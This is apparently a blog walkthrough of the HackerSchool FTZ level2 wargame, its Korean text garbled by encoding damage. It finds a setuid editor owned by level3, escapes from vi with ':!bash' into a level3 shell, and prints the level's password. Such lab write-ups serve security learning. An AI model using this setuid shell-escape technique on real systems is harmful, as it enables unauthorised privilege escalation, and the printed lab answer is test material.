$ cat hint
[level2@ftz level2]$ cat hint
ํ
์คํธ ํ์ผ ํธ์ง ์ค ์์ ๋ช
๋ น์ ์คํ์ํฌ ์ ์๋ค๋๋ฐ...
์ด๋ฒ ๋ฌธ์ ๋ ํ์ผ์ ํธ์งํ ๋ ์ป์ ๊ถํ์ผ๋ก ๋ฐ๋ก ์ ๋ช
๋ น,
์ฆ my-pass๋ฅผ ์คํ์์ผ์ ํจ์ค์๋๋ฅผ ์ป์ด๋ด๋ ๋ฌธ์ ๋ค.
์ผ๋จ level3 ๊ถํ์ ์ค ์ ์์ผ๋ฉด์ ํธ์งํ ์ ์๋ ํ์ผ์ ์ฐพ์๋ณด์
$ find / -user level3
[level2@ftz level2]$ find / -user level3
find: /lost+found: Permission denied
find: /boot/lost+found: Permission denied
find: /proc/1/fd: Permission denied
...
/usr/bin/editor
...
find: /home/trainer7: Permission denied
find: /home/trainer8: Permission denied
find: /home/trainer9: Permission denied
์๋ง์ ์ ๊ทผ ๋ถ๊ฐ ํ์ผ๋ค ์ฌ์ด ์ ๊ทผ ๊ฐ๋ฅํ /usr/bin/editor ๊ฐ ๋ณด์ธ๋ค
๋ฐ๋ก ์คํ์์ผ์ฃผ์
$ /usr/bin/editor
ํ์ผ์ ํธ์งํ ์ ์๋ ํธ์ง๊ธฐ๊ฐ ๋์จ๋ค.
vi ์๋ํฐ๋ผ ์ด๊ฒ์ ๊ฒ ๊ธ์๋ ๋ฐ๊พธ๊ณ ์์ ๋ ํ ์ ์์ง๋ง
์ฐ๋ฆฌ๊ฐ ํด์ผํ ๊ฑด ์ฌ๊ธฐ์ ๋ช
๋ น์ด๋ฅผ ์ํํ๋๊ฒ.
vi ์๋ํฐ ๋ด์์ ๋๋ํ(!)๋ฅผ ์์ ๋ถ์ด๋ฉด ๋ช
๋ น์ ์ํํ ์ ์๋ค,
๋ฌผ๋ก ํด๋น ํธ์ง์ ํ๊ณ ์๋ ๊ถํ์ผ๋ก!!
ํ์ฌ ๊ถํ(level3)์ผ๋ก bash ์์ ์ด์ด๋ฒ๋ฆฌ์
:!bash
[level3@ftz bin]$
์๋ํฐ ๋ฐ์ผ๋ก ๋๊ฐ์ก์ง๋ง ์์ธํ ๋ณด๋ฉด ์ ์ ๊ฐ level3๋ก ๋์ด์๋ค
๊ทธ๋ผ ์ด์ my-pass๋ฅผ ์คํํ์ฌ ๋น๋ฒ์ ๊ฐ์ ธ๊ฐ์
$ my-pass
[level3@ftz bin]$ my-pass
Level3 Password is "can you fly?".
'๐ CTF (Dreamhack) > System Hacking (์์คํ ํดํน)' ์นดํ ๊ณ ๋ฆฌ์ ๋ค๋ฅธ ๊ธ
[HackerSchool] ํด์ปค์ค์ฟจ FTZ: level3 (0) | 2022.10.11 |
---|---|
[HackerSchool] ํด์ปค์ค์ฟจ FTZ: Level1 (0) | 2022.10.05 |